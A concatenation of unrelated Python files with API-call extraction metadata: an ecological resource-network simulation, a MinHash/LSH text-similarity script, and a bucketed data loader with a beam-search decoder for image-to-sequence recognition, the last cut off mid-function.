8281), 'numpy.where', 'np.where', (['rows'], {}), '(rows)\n', (8275, 8281), True, 'import numpy as np\n'), ((8320, 8334), 'numpy.where', 'np.where', (['cols'], {}), '(cols)\n', (8328, 8334), True, 'import numpy as np\n'), ((9021, 9034), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (9029, 9034), True, 'import numpy as np\n')] |
# -*- coding: utf-8 -*-
"""
Created on Tue Feb 26 14:55:35 2019
@author: hindesa
"""
import random
import numpy as np
import matplotlib.pyplot as plt
import networkx as nx
# Random resource network
# Using ecological subsystem only version of TSL
#Assume n,m same for both social networks
#total no. agents
n = 20
#number of links
#May change depending on how network is generated, links are added
#if an isolated node is made
m = 30
mu = 1.2
ec = 0.483/50. #level of effort (cooperators) #level of effort (defectors)
# Defectors exert mu times the cooperator effort.
ed = mu*ec
# Rmax: resource carrying capacity; c: per-node random growth constants;
# d, q: dynamics coefficients used in the simulation loop below.
Rmax = 250
c = random.sample(range(20, 60), n)
d, q = 50, 1
# Network
G = nx.gnm_random_graph(n, m)
# Need network to have no isolated nodes
# If there is an isolated node, find it and link it the next node
for k in range(n):
    if len([j for j in G.neighbors(k)]) == 0:
        G.add_edge(k,(k+1))
    else:
        pass
m = G.number_of_edges() #Reassign in case rewire
#Populate resources with random levels of stock
stocks = random.sample(range(int(np.floor(Rmax/4)),Rmax), n)
for j in range(n):
    # NOTE(review): G.node is the networkx < 2.4 API (G.nodes thereafter) —
    # presumably this was written against an older networkx; verify.
    G.node[j]['node_size'] = stocks[j]
# Randomize coupling strengths between 0.1 and 0.5
# NOTE(review): sampling m values from only 50 candidates — fails if m > 50.
deltas = random.sample(set(np.linspace(0.1, 0.5, num=50)), m)
k = 0
for u,v,l in G.edges(data=True):
    l['weight'] = deltas[k]
    k += 1
nx.draw_networkx(G, pos=None, node_size = stocks)
plt.title('Initial Network')
plt.show()
# Extraction function
def ext(f):
    """Total harvesting effort for cooperator fraction ``f``.

    Relies on the module-level ``n`` (agent count), ``ec`` and ``ed``
    (per-capita efforts of cooperators and defectors).
    """
    return n * (f * ec + (1 - f) * ed)
# initial condition
# static fraction of cooperators
fc = 0.7
R = 200
t = 0
tEnd = 30 #end point
dt = 0.1 #time step
# Lists to store values to plot later
time = []
rLists = []
k = 0
while k < n:
    rLists.append([])
    k += 1
# Forward-Euler integration of each node's resource stock, with diffusive
# coupling along weighted edges.
while t<tEnd:
    R = np.zeros(n)
    for k in range(n):
        R[k] = G.node[k]['node_size']
        # Local growth minus crowding and harvest terms.
        dRself = c[k] - d*(R[k]/Rmax)**2 - q*ext(fc)*R[k]
        # Flow to/from each neighbour, proportional to the stock difference.
        differences = [G.edges[j,k]['weight']*(G.node[j]['node_size'] - R[k]) for j in G.neighbors(k)]
        inOutFlow = sum(differences)
        dR = (dRself + inOutFlow)*dt
        R[k] += dR
        G.node[k]['node_size'] += dR
    #update quantities
    t += dt
    #append lists
    time.append(t)
    for k in range(n):
        rLists[k].append(R[k])
# Plot
plt.xlabel('Time')
plt.ylabel('Resource Stock')
for i in range(n):
    plt.plot(time, rLists[i])
plt.show()
stocks = nx.get_node_attributes(G, 'node_size')
sizes = [stocks[k] for k in stocks]
nx.draw_networkx(G, pos=None, node_size = sizes)
plt.title('Final Network')
plt.show()
| [
"matplotlib.pyplot.title",
"matplotlib.pyplot.show",
"matplotlib.pyplot.plot",
"numpy.floor",
"numpy.zeros",
"networkx.draw_networkx",
"numpy.linspace",
"networkx.get_node_attributes",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel",
"networkx.gnm_random_graph"
] | [((611, 636), 'networkx.gnm_random_graph', 'nx.gnm_random_graph', (['n', 'm'], {}), '(n, m)\n', (630, 636), True, 'import networkx as nx\n'), ((1280, 1327), 'networkx.draw_networkx', 'nx.draw_networkx', (['G'], {'pos': 'None', 'node_size': 'stocks'}), '(G, pos=None, node_size=stocks)\n', (1296, 1327), True, 'import networkx as nx\n'), ((1331, 1359), 'matplotlib.pyplot.title', 'plt.title', (['"""Initial Network"""'], {}), "('Initial Network')\n", (1340, 1359), True, 'import matplotlib.pyplot as plt\n'), ((1360, 1370), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1368, 1370), True, 'import matplotlib.pyplot as plt\n'), ((2228, 2246), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Time"""'], {}), "('Time')\n", (2238, 2246), True, 'import matplotlib.pyplot as plt\n'), ((2247, 2275), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Resource Stock"""'], {}), "('Resource Stock')\n", (2257, 2275), True, 'import matplotlib.pyplot as plt\n'), ((2325, 2335), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2333, 2335), True, 'import matplotlib.pyplot as plt\n'), ((2346, 2384), 'networkx.get_node_attributes', 'nx.get_node_attributes', (['G', '"""node_size"""'], {}), "(G, 'node_size')\n", (2368, 2384), True, 'import networkx as nx\n'), ((2421, 2467), 'networkx.draw_networkx', 'nx.draw_networkx', (['G'], {'pos': 'None', 'node_size': 'sizes'}), '(G, pos=None, node_size=sizes)\n', (2437, 2467), True, 'import networkx as nx\n'), ((2471, 2497), 'matplotlib.pyplot.title', 'plt.title', (['"""Final Network"""'], {}), "('Final Network')\n", (2480, 2497), True, 'import matplotlib.pyplot as plt\n'), ((2498, 2508), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2506, 2508), True, 'import matplotlib.pyplot as plt\n'), ((1707, 1718), 'numpy.zeros', 'np.zeros', (['n'], {}), '(n)\n', (1715, 1718), True, 'import numpy as np\n'), ((2299, 2324), 'matplotlib.pyplot.plot', 'plt.plot', (['time', 'rLists[i]'], {}), '(time, rLists[i])\n', (2307, 2324), True, 'import 
matplotlib.pyplot as plt\n'), ((1164, 1193), 'numpy.linspace', 'np.linspace', (['(0.1)', '(0.5)'], {'num': '(50)'}), '(0.1, 0.5, num=50)\n', (1175, 1193), True, 'import numpy as np\n'), ((994, 1012), 'numpy.floor', 'np.floor', (['(Rmax / 4)'], {}), '(Rmax / 4)\n', (1002, 1012), True, 'import numpy as np\n')] |
import requests
import pandas as pd
import numpy as np
import io
from nltk.corpus import stopwords
# English stop-word list shared by remove_stopwords.
stop = stopwords.words('english')
def remove_stopwords(df, column: str):
    """Add a '<column>_without_stopwords' column with stop words stripped."""
    def _strip(text):
        kept = [token for token in text.split() if token not in stop]
        return ' '.join(kept)
    df[column +"_without_stopwords"] = df[column].apply(_strip)
    return df
# url = "https://raw.githubusercontent.com/brmson/dataset-sts/master/data/sts/sick2014/SICK_train.txt"
# text = requests.get(url).text
# data = pd.read_csv(io.StringIO(text), sep="\t")
# Load the local plagiarism dataset; 'unicode_escape' handles its encoding.
data = pd.read_csv('plagiarism.csv', encoding= 'unicode_escape')
# print(data.head())
#data = remove_stopwords(data, 'Sentences')
#sentences = data['Sentences_without_stopwords'].tolist()
# Raw sentences to be shingled below; assumes a 'Sentences' column exists.
sentences = data['Sentences'].tolist()
# print(sentences[:3])
#We have our data, now to shingle and one-hot encode it.
def build_shingles(sentence: str, k: int):
    """Return the set of character k-shingles (k-grams) of ``sentence``.

    Bug fix: the loop bound was ``range(len(sentence) - k)``, which dropped
    the final shingle — strings differing only in their last character
    produced identical shingle sets. The bound is now ``len(sentence) - k + 1``
    so every k-gram is included.
    """
    return {sentence[i:i + k] for i in range(len(sentence) - k + 1)}
def build_vocab(shingle_sets: list):
    """Map every distinct shingle across all the sets to a unique int id."""
    # Union all shingle sets, then number the distinct shingles 0..V-1.
    union = set()
    for shingles in shingle_sets:
        union.update(shingles)
    return {shingle: idx for idx, shingle in enumerate(union)}
def one_hot(shingles: set, vocab: dict):
    """Encode a shingle set as a dense 0/1 vector over the vocabulary."""
    encoding = np.zeros(len(vocab))
    # Set every vocabulary position that appears in the shingle set.
    positions = [vocab[shingle] for shingle in shingles]
    encoding[positions] = 1
    return encoding
k = 6 # shingle size
# build shingles
shingles = []
for sentence in sentences:
    shingles.append(build_shingles(sentence, k))
# build vocab
vocab = build_vocab(shingles)
# one-hot encode our shingles
shingles_1hot = []
for shingle_set in shingles:
    shingles_1hot.append(one_hot(shingle_set, vocab))
# stack into single numpy array
# Resulting shape: (num_sentences, vocab_size).
shingles_1hot = np.stack(shingles_1hot)
print(shingles_1hot.shape)
print(shingles_1hot[0].shape)
# print(sum(shingles_1hot[0])) # confirm we have 1s
# MinHash
# Now we move onto minhashing, first we need to create functions for building a range of minhash vectors, and another to process our sparse vectors through this minhash array - to produce our signatures.
def minhash_arr(vocab: dict, resolution: int):
    """Build ``resolution`` minhash rows, each a permutation of 1..len(vocab)."""
    n_terms = len(vocab)
    hashes = np.zeros((resolution, n_terms), dtype=int)
    for row in range(resolution):
        hashes[row] = np.random.permutation(n_terms) + 1
    return hashes
def get_signature(minhash, vector):
    """Compress a sparse one-hot vector into its minhash signature."""
    # Columns of the minhash array where the one-hot vector is non-zero.
    active = np.flatnonzero(vector)
    selected = minhash[:, active]
    # The signature is the per-row minimum over the active columns.
    return selected.min(axis=1)
# 40 hash functions -> signatures of length 40.
arr = minhash_arr(vocab, 40)
signatures = []
for vector in shingles_1hot:
    signatures.append(get_signature(arr, vector))
# merge signatures into single array
signatures = np.stack(signatures)
#print(signatures.shape)
print(signatures[0])
# LSH
# Finally, we move onto the LSH process. We will use a class here:
from itertools import combinations
class LSH:
    """Locality-sensitive hashing over minhash signatures via banding."""

    def __init__(self, b):
        """b: number of bands each signature is split into (must divide
        the signature length)."""
        self.b = b
        # Bug fix: buckets/counter were *class* attributes, so every LSH
        # instance shared (and kept accumulating into) the same bucket list.
        # They are per-instance state.
        self.buckets = [{} for _ in range(b)]
        self.counter = 0

    def make_subvecs(self, signature):
        """Split a signature into b equal subvectors, stacked row-wise."""
        l = len(signature)
        assert l % self.b == 0
        r = int(l / self.b)
        # break signature into subvectors
        subvecs = []
        for i in range(0, l, r):
            subvecs.append(signature[i:i + r])
        return np.stack(subvecs)

    def add_hash(self, signature):
        """Hash one signature into every band's bucket dict."""
        subvecs = self.make_subvecs(signature).astype(str)
        for i, subvec in enumerate(subvecs):
            key = ','.join(subvec)
            self.buckets[i].setdefault(key, []).append(self.counter)
        # Bug fix: the signature id must advance once per *signature*, not
        # once per band — it previously incremented inside the loop above,
        # giving the same signature a different id in every band and making
        # candidate pairs meaningless as sentence indices.
        self.counter += 1

    def check_candidates(self):
        """Return the set of candidate pairs: ids co-hashed in any bucket."""
        candidates = []
        for bucket_band in self.buckets:
            for hits in bucket_band.values():
                if len(hits) > 1:
                    candidates.extend(combinations(hits, 2))
        return set(candidates)
# 20 bands over length-40 signatures -> 2 rows per band.
b = 20
lsh = LSH(b)
for signature in signatures:
    lsh.add_hash(signature)
print(lsh.buckets)
# Now we've filled our hash buckets all we need to do is loop through each and where we have multiple entries in a single bucket, mark these as our candidate pairs.
candidate_pairs = lsh.check_candidates()
print(len(candidate_pairs))
print(list(candidate_pairs))
# We now have all of our candidate pairs!
# Optimizing the Bands
# Now let's visualize the actual cosine similarity of our signature vectors against whether we identified the signatures as candidate pairs or not.
# (we will also calculate Jaccard but it's less useful here, try both!)
# from sklearn.metrics.pairwise import cosine_similarity
# def jaccard(a: set, b: set):
# return len(a.intersection(b)) / len(a.union(b))
# pairs = pd.DataFrame({
# 'x': [],
# 'y': [],
# 'jaccard': [],
# 'cosine': [],
# 'candidate': []
# })
# from tqdm import tqdm
# data_len = shingles_1hot.shape[0]
# chosen = set()
# # take random sample of pairs
# sample_size = 500
# for _ in tqdm(range(sample_size)):
# x, y = np.random.choice(data_len, 2)
# if x == y or (x, y) in chosen: continue
# chosen.add((x, y))
# vector_x = signatures[x]
# vector_y = signatures[y]
# candidate = 1 if (x, y) in candidate_pairs else 0
# cosine = cosine_similarity([vector_x], [vector_y])[0][0]
# pairs = pairs.append({
# 'x': x,
# 'y': y,
# 'jaccard': jaccard(set(vector_x), set(vector_y)),
# 'cosine': cosine,
# 'candidate': candidate
# }, ignore_index=True)
# # add a normalized cosine column for better alignment
# cos_min = pairs['cosine'].min()
# cos_max = pairs['cosine'].max()
# pairs['cosine_norm'] = (pairs['cosine'] - cos_min) / (cos_max - cos_min)
# import matplotlib.pyplot as plt
# import seaborn as sns
# sns.scatterplot(data=pairs, x='cosine', y='candidate', alpha=0.5)
# plt.show()
# # Now, this is an interesting way to visualize our distribution, but we have reason.
# # We can actually tune our LSH function using b, and we have a formalized function that tells us the probability of identifying a pair as candidate pairs given their similarity.
# # We calculate this as so:
# def probability(s, r, b):
# # s: similarity
# # r: rows (per band)
# # b: number of bands
# return 1 - (1 - s**r)**b
# def normalize(x, x_min, x_max):
# return (x - x_min) / (x_max - x_min)
# # Let's visualize that for our current parameters, alongside our scatter plot.
# b = 25
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='cosine', y='candidate', alpha=0.1, color='k')
# plt.show()
# b = 25
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='cosine_norm', y='candidate', alpha=0.1, color='k')
# plt.show()
# # From here we can attempt to modify the similarity threshold t - which is the cut-off point on our similarity axes as to where we would like a given cosine similarity to rate as a candidate pair or not.
# # Let's try a few different band values with our probability formula to see where this balance may be.
# probs = pd.DataFrame({
# 'P': [],
# 's': [],
# 'b': []
# })
# for b in [100, 50, 25, 20, 10, 5, 2]:
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# probs = probs.append(pd.DataFrame({
# 'P': P_scores,
# 's': s_scores,
# 'b': [str(b)]*len(s_scores)
# }), ignore_index=True)
# sns.lineplot(data=probs, x='s', y='P', hue='b')
# plt.show()
# # So a b value of 20 have us a threshold value t slightly too high (depending on our definition of 'similar'), so maybe we can use b == 25 to get a better distribution of our candidate pairs.
# b = 25
# lsh = LSH(b)
# for signature in signatures:
# lsh.add_hash(signature)
# candidate_pairs = lsh.check_candidates()
# len(candidate_pairs)
# pairs = pd.DataFrame({
# 'x': [],
# 'y': [],
# 'jaccard': [],
# 'cosine': [],
# 'candidate': []
# })
# data_len = shingles_1hot.shape[0]
# chosen = set()
# # take random sample of pairs
# sample_size = 50_000
# for _ in tqdm(range(sample_size)):
# x, y = np.random.choice(data_len, 2)
# if x == y or (x, y) in chosen: continue
# chosen.add((x, y))
# vector_x = signatures[x]
# vector_y = signatures[y]
# candidate = 1 if (x, y) in candidate_pairs else 0
# cosine = cosine_similarity([vector_x], [vector_y])[0][0]
# pairs = pairs.append({
# 'x': x,
# 'y': y,
# 'jaccard': jaccard(set(vector_x), set(vector_y)),
# 'cosine': cosine,
# 'candidate': candidate
# }, ignore_index=True)
# # add a normalized cosine column for better alignment
# cos_min = pairs['cosine'].min()
# cos_max = pairs['cosine'].max()
# pairs['cosine_norm'] = (pairs['cosine'] - cos_min) / (cos_max - cos_min)
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='cosine_norm', y='candidate', alpha=0.1, color='k')
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='cosine_norm', y='candidate', alpha=0.1, color='k')
# # Shifting from b == 20 to b == 25 has reduced the number of non-candidates around 0.7 - 0.8, and we can see that the number of candidate pairs in total has increased significantly too, from 7468 to 19436.
# # Now, in our own use-cases, the preferred similarity threshold will of-course change.
# # It's also worth noting that different similarity metrics will produce different charts:
# r = int(100 / b)
# s_scores = np.arange(0.01, 1, 0.01)
# P_scores = [probability(s, r, b) for s in s_scores]
# sns.lineplot(x=s_scores, y=P_scores)
# sns.scatterplot(data=pairs, x='jaccard', y='candidate', alpha=0.1, color='k')
# plt.show()
| [
"numpy.stack",
"pandas.read_csv",
"numpy.zeros",
"numpy.nonzero",
"itertools.combinations",
"numpy.min",
"nltk.corpus.stopwords.words"
] | [((106, 132), 'nltk.corpus.stopwords.words', 'stopwords.words', (['"""english"""'], {}), "('english')\n", (121, 132), False, 'from nltk.corpus import stopwords\n'), ((505, 561), 'pandas.read_csv', 'pd.read_csv', (['"""plagiarism.csv"""'], {'encoding': '"""unicode_escape"""'}), "('plagiarism.csv', encoding='unicode_escape')\n", (516, 561), True, 'import pandas as pd\n'), ((1759, 1782), 'numpy.stack', 'np.stack', (['shingles_1hot'], {}), '(shingles_1hot)\n', (1767, 1782), True, 'import numpy as np\n'), ((2898, 2918), 'numpy.stack', 'np.stack', (['signatures'], {}), '(signatures)\n', (2906, 2918), True, 'import numpy as np\n'), ((2198, 2228), 'numpy.zeros', 'np.zeros', (['(resolution, length)'], {}), '((resolution, length))\n', (2206, 2228), True, 'import numpy as np\n'), ((2674, 2698), 'numpy.min', 'np.min', (['shingles'], {'axis': '(1)'}), '(shingles, axis=1)\n', (2680, 2698), True, 'import numpy as np\n'), ((3512, 3529), 'numpy.stack', 'np.stack', (['subvecs'], {}), '(subvecs)\n', (3520, 3529), True, 'import numpy as np\n'), ((2487, 2505), 'numpy.nonzero', 'np.nonzero', (['vector'], {}), '(vector)\n', (2497, 2505), True, 'import numpy as np\n'), ((4176, 4197), 'itertools.combinations', 'combinations', (['hits', '(2)'], {}), '(hits, 2)\n', (4188, 4197), False, 'from itertools import combinations\n')] |
import random
import numpy as np
import copy
import sys
import pickle as pkl
import torch
from torch import nn
class BatchBucket():
    """Groups variable-size (image, label) samples into size-bucketed
    mini-batches, bounding each batch by a maximum total image area."""
    def __init__(self, max_h, max_w, max_l, max_img_size, max_batch_size, feature_file, label_file, dictionary,
                 use_all=True):
        """Load the dictionary and data files, derive bucket keys and build
        the shuffled batch plan.

        max_h/max_w/max_l: caps on image height/width and label length.
        max_img_size: max total pixel area per batch (batch_size * h * w).
        max_batch_size: hard cap on samples per batch.
        use_all: if True, every bucket key is kept (threshold of 1 sample).
        """
        self._max_img_size = max_img_size
        self._max_batch_size = max_batch_size
        self._fea_file = feature_file
        self._label_file = label_file
        self._dictionary_file = dictionary
        self._use_all = use_all
        self._dict_load()
        self._data_load()
        self.keys = self._calc_keys(max_h, max_w, max_l)
        self._make_plan()
        self._reset()
    def _dict_load(self):
        """Read the 'token index' per-line dictionary into self._lexicon."""
        fp = open(self._dictionary_file)
        stuff = fp.readlines()
        fp.close()
        self._lexicon = {}
        for l in stuff:
            w = l.strip().split()
            self._lexicon[w[0]] = int(w[1])
    def _data_load(self):
        """Load pickled features and text labels; map label words to ids.

        Exits the process on any out-of-vocabulary word.
        """
        fp_fea = open(self._fea_file, 'rb')
        self._features = pkl.load(fp_fea)
        fp_fea.close()
        fp_label = open(self._label_file, 'r')
        labels = fp_label.readlines()
        fp_label.close()
        self._targets = {}
        for l in labels:
            tmp = l.strip().split()
            uid = tmp[0]
            w_list = []
            for w in tmp[1:]:
                if self._lexicon.__contains__(w):
                    w_list.append(self._lexicon[w])
                else:
                    print('a word not in the dictionary !! sentence ', uid, 'word ', w)
                    sys.exit()
            self._targets[uid] = w_list
        # (uid, h, w, tgt_len)
        # NOTE(review): relies on features and targets iterating in the same
        # uid order — presumably both files list the same uids in sequence.
        self._data_parser = [(uid, fea.shape[1], fea.shape[2], len(label)) for (uid, fea), (_, label) in
                             zip(self._features.items(), self._targets.items())]
    def _calc_keys(self, max_h, max_w, max_l):
        """Build candidate (h, w, label_len) bucket keys on a coarse grid,
        then keep keys greedily so each retained key accumulates at least
        `th` samples (1 when use_all)."""
        mh = mw = ml = 0
        for _, h, w, l in self._data_parser:
            if h > mh:
                mh = h
            if w > mw:
                mw = w
            if l > ml:
                ml = l
        # Never exceed the actual data extents.
        max_h = min(max_h, mh)
        max_w = min(max_w, mw)
        max_l = min(max_l, ml)
        keys = []
        init_h = 64 if 64 < max_h else max_h
        init_w = 64 if 64 < max_w else max_w
        init_l = 20 if 20 < max_l else max_l
        h_step = 64
        w_step = 64
        l_step = 30
        h = init_h
        # Enumerate the grid; the continue-after-clamp pattern guarantees the
        # max value itself is always included as the final grid point.
        while h <= max_h:
            w = init_w
            while w <= max_w:
                l = init_l
                while l <= max_l:
                    keys.append([h, w, l, h * w * l, 0])
                    if l < max_l and l + l_step > max_l:
                        l = max_l
                        continue
                    l += l_step
                if w < max_w and w + w_step > max_w:
                    w = max_w
                    continue
                w += w_step
            if h < max_h and h + h_step > max_h:
                h = max_h
                continue
            h += h_step
        # Sort by volume so each sample is counted in its smallest fitting key.
        keys = sorted(keys, key=lambda area: area[3])
        for _, h, w, l in self._data_parser:
            for i in range(len(keys)):
                hh, ww, ll, _, _ = keys[i]
                if h <= hh and w <= ww and l <= ll:
                    keys[i][-1] += 1
                    break
        new_keys = []
        n_samples = len(self._data_parser)
        th = n_samples * 0.01
        if self._use_all:
            th = 1
        num = 0
        for key in keys:
            hh, ww, ll, _, n = key
            num += n
            if num >= th:
                new_keys.append((hh, ww, ll))
                num = 0
        return new_keys
    def _make_plan(self):
        """Derive per-bucket batch sizes from the area budget and assign
        each sample to the smallest bucket it fits into."""
        self._bucket_keys = []
        for h, w, l in self.keys:
            batch_size = int(self._max_img_size / (h * w))
            if batch_size > self._max_batch_size:
                batch_size = self._max_batch_size
            if batch_size == 0:
                continue
            self._bucket_keys.append((batch_size, h, w, l))
        self._data_buckets = [[] for key in self._bucket_keys]
        unuse_num = 0
        for item in self._data_parser:
            flag = 0
            for key, bucket in zip(self._bucket_keys, self._data_buckets):
                _, h, w, l = key
                if item[1] <= h and item[2] <= w and item[3] <= l:
                    bucket.append(item)
                    flag = 1
                    break
            if flag == 0:
                unuse_num += 1
        print('The number of unused samples: ', unuse_num)
        all_sample_num = 0
        for key, bucket in zip(self._bucket_keys, self._data_buckets):
            sample_num = len(bucket)
            all_sample_num += sample_num
            print('bucket {}, sample number={}'.format(key, len(bucket)))
        print('All samples number={}, raw samples number={}'.format(all_sample_num, len(self._data_parser)))
    def _reset(self):
        """Shuffle each bucket and slice it into batches of its batch size."""
        # shuffle data in each bucket
        for bucket in self._data_buckets:
            random.shuffle(bucket)
        self._batches = []
        # NOTE(review): the loop variable 'id' shadows the builtin id().
        for id, (key, bucket) in enumerate(zip(self._bucket_keys, self._data_buckets)):
            batch_size, _, _, _ = key
            bucket_len = len(bucket)
            batch_num = (bucket_len + batch_size - 1) // batch_size
            for i in range(batch_num):
                start = i * batch_size
                end = start + batch_size if start + batch_size < bucket_len else bucket_len
                if start != end: # remove empty batch
                    self._batches.append(bucket[start:end])
    def get_batches(self):
        """Return (batches, uids): batches is a list of (features, labels)
        list pairs; uids lists sample ids in the same flattened order."""
        batches = []
        uid_batches = []
        for batch_info in self._batches:
            fea_batch = []
            label_batch = []
            for uid, _, _, _ in batch_info:
                feature = self._features[uid]
                label = self._targets[uid]
                fea_batch.append(feature)
                label_batch.append(label)
                uid_batches.append(uid)
            batches.append((fea_batch, label_batch))
        return batches, uid_batches
# load dictionary
def load_dict(dictFile):
    """Read a per-line 'token index' vocabulary file into a dict."""
    with open(dictFile) as fh:
        lines = fh.readlines()
    lexicon = {}
    for line in lines:
        parts = line.strip().split()
        lexicon[parts[0]] = int(parts[1])
    print('total words/phones', len(lexicon))
    return lexicon
# create batch
def prepare_data(params, images_x, seqs_ly, seqs_ry, seqs_re, seqs_ma, seqs_lp, seqs_rp):
    """Pad a list of variable-size samples into fixed-size batch tensors
    plus 0/1 masks marking the valid (unpadded) region of each.

    images_x: list of (channels, h, w) arrays — assumed already channel-first.
    seqs_ly/seqs_ry: left/right-direction label sequences.
    seqs_re: relation labels; seqs_ma: (len, len) alignment matrices;
    seqs_lp/seqs_rp: left/right position sequences.
    Returns the padded arrays and masks, time-major (maxlen, n_samples)
    for the sequence tensors.
    """
    heights_x = [s.shape[1] for s in images_x]
    widths_x = [s.shape[2] for s in images_x]
    lengths_ly = [len(s) for s in seqs_ly]
    lengths_ry = [len(s) for s in seqs_ry]
    n_samples = len(heights_x)
    max_height_x = np.max(heights_x)
    max_width_x = np.max(widths_x)
    maxlen_ly = np.max(lengths_ly)
    maxlen_ry = np.max(lengths_ry)
    x = np.zeros((n_samples, params['input_channels'], max_height_x, max_width_x)).astype(np.float32)
    ly = np.zeros((maxlen_ly, n_samples)).astype(np.int64)  # <eos> must be 0 in the dict
    ry = np.zeros((maxlen_ry, n_samples)).astype(np.int64)
    re = np.zeros((maxlen_ly, n_samples)).astype(np.int64)
    ma = np.zeros((n_samples, maxlen_ly, maxlen_ly)).astype(np.int64)
    lp = np.zeros((maxlen_ly, n_samples)).astype(np.int64)
    rp = np.zeros((maxlen_ry, n_samples)).astype(np.int64)
    x_mask = np.zeros((n_samples, max_height_x, max_width_x)).astype(np.float32)
    ly_mask = np.zeros((maxlen_ly, n_samples)).astype(np.float32)
    ry_mask = np.zeros((maxlen_ry, n_samples)).astype(np.float32)
    re_mask = np.zeros((maxlen_ly, n_samples)).astype(np.float32)
    ma_mask = np.zeros((n_samples, maxlen_ly, maxlen_ly)).astype(np.float32)
    for idx, [s_x, s_ly, s_ry, s_re, s_ma, s_lp, s_rp] in enumerate(zip(images_x, seqs_ly, seqs_ry, seqs_re, seqs_ma, seqs_lp, seqs_rp)):
        # Pixel values normalised to [0, 1]; mask covers the real image area.
        x[idx, :, :heights_x[idx], :widths_x[idx]] = s_x / 255.
        x_mask[idx, :heights_x[idx], :widths_x[idx]] = 1.
        ly[:lengths_ly[idx], idx] = s_ly
        ly_mask[:lengths_ly[idx], idx] = 1.
        ry[:lengths_ry[idx], idx] = s_ry
        ry_mask[:lengths_ry[idx], idx] = 1.
        ry_mask[0, idx] = 0. # remove the <s>
        re[:lengths_ly[idx], idx] = s_re
        re_mask[:lengths_ly[idx], idx] = 1.
        re_mask[0, idx] = 0. # remove the Start relation
        re_mask[lengths_ly[idx]-1, idx] = 0. # remove the End relation
        ma[idx, :lengths_ly[idx], :lengths_ly[idx]] = s_ma
        # Causal (lower-triangular style) mask over alignment columns.
        for ma_idx in range(lengths_ly[idx]):
            ma_mask[idx, :(ma_idx+1), ma_idx] = 1.
        lp[:lengths_ly[idx], idx] = s_lp
        # lp_mask[:lengths_ly[idx], idx] = 1
        rp[:lengths_ry[idx], idx] = s_rp
    return x, x_mask, ly, ly_mask, ry, ry_mask, re, re_mask, ma, ma_mask, lp, rp
def gen_sample(model, x, params, gpu_flag, k=1, maxlen=30, rpos_beam=3):
    """Two-stage (parent-then-child) beam-search decoder for one input image.

    For at most `maxlen` steps, each of the live beam paths proposes the
    `rpos_beam` most-attended parent positions (f_next_parent), the child
    decoder scores the vocabulary for every (path, parent) candidate
    (f_next_child), and the `k - dead_k` cheapest (path, parent, symbol)
    combinations survive.  Paths emitting symbol 0 (<eol>) are retired.

    Returns (sample_score, sample, rpos_sample, relation_sample) for the
    finished paths.

    NOTE(review): `gpu_flag` is accepted but never read; `.cuda()` is
    called unconditionally, so a CUDA device is required — confirm intended.
    """
    sample = []
    sample_score = []
    rpos_sample = []
    # rpos_sample_score = []
    relation_sample = []
    live_k = 1
    dead_k = 0  # except init, live_k = k - dead_k
    # current living paths and corresponding scores(-log)
    hyp_samples = [[]] * live_k
    hyp_scores = np.zeros(live_k).astype(np.float32)
    hyp_rpos_samples = [[]] * live_k
    hyp_relation_samples = [[]] * live_k
    # get init state, (1,n) and encoder output, (1,D,H,W)
    next_state, ctx0 = model.f_init(x)
    next_h1t = next_state
    # -1 -> My_embedding -> 0 tensor(1,m)
    next_lw = -1 * torch.ones(1, dtype=torch.int64).cuda()
    next_calpha_past = torch.zeros(1, ctx0.shape[2], ctx0.shape[3]).cuda()  # (live_k,H,W)
    next_palpha_past = torch.zeros(1, ctx0.shape[2], ctx0.shape[3]).cuda()
    nextemb_memory = torch.zeros(params['maxlen'], live_k, params['m']).cuda()
    nextePmb_memory = torch.zeros(params['maxlen'], live_k, params['m']).cuda()
    for ii in range(maxlen):
        # --- parent step: attend over previously emitted symbols ---
        ctxP = ctx0.repeat(live_k, 1, 1, 1)  # (live_k,D,H,W)
        next_lpos = ii * torch.ones(live_k, dtype=torch.int64).cuda()
        next_h01, next_ma, next_ctP, next_pa, next_palpha_past, nextemb_memory, nextePmb_memory = \
            model.f_next_parent(params, next_lw, next_lpos, ctxP, next_state, next_h1t, next_palpha_past, nextemb_memory, nextePmb_memory, ii)
        next_ma = next_ma.cpu().numpy()
        # next_ctP = next_ctP.cpu().numpy()
        next_palpha_past = next_palpha_past.cpu().numpy()
        nextemb_memory = nextemb_memory.cpu().numpy()
        nextePmb_memory = nextePmb_memory.cpu().numpy()
        nextemb_memory = np.transpose(nextemb_memory, (1, 0, 2))  # batch * Matt * dim
        nextePmb_memory = np.transpose(nextePmb_memory, (1, 0, 2))
        next_rpos = next_ma.argsort(axis=1)[:, -rpos_beam:]  # topK parent index; batch * topK
        # Gather the embeddings of the selected parent positions.
        n_gaps = nextemb_memory.shape[1]
        n_batch = nextemb_memory.shape[0]
        next_rpos_gap = next_rpos + n_gaps * np.arange(n_batch)[:, None]
        next_remb_memory = nextemb_memory.reshape([n_batch * n_gaps, nextemb_memory.shape[-1]])
        next_remb = next_remb_memory[next_rpos_gap.flatten()]  # [batch*rpos_beam, emb_dim]
        rpos_scores = next_ma.flatten()[next_rpos_gap.flatten()]  # [batch*rpos_beam,]
        # Replicate per-path tensors once per parent candidate.
        # next_ctPC = next_ctP.repeat(1, 1, rpos_beam)
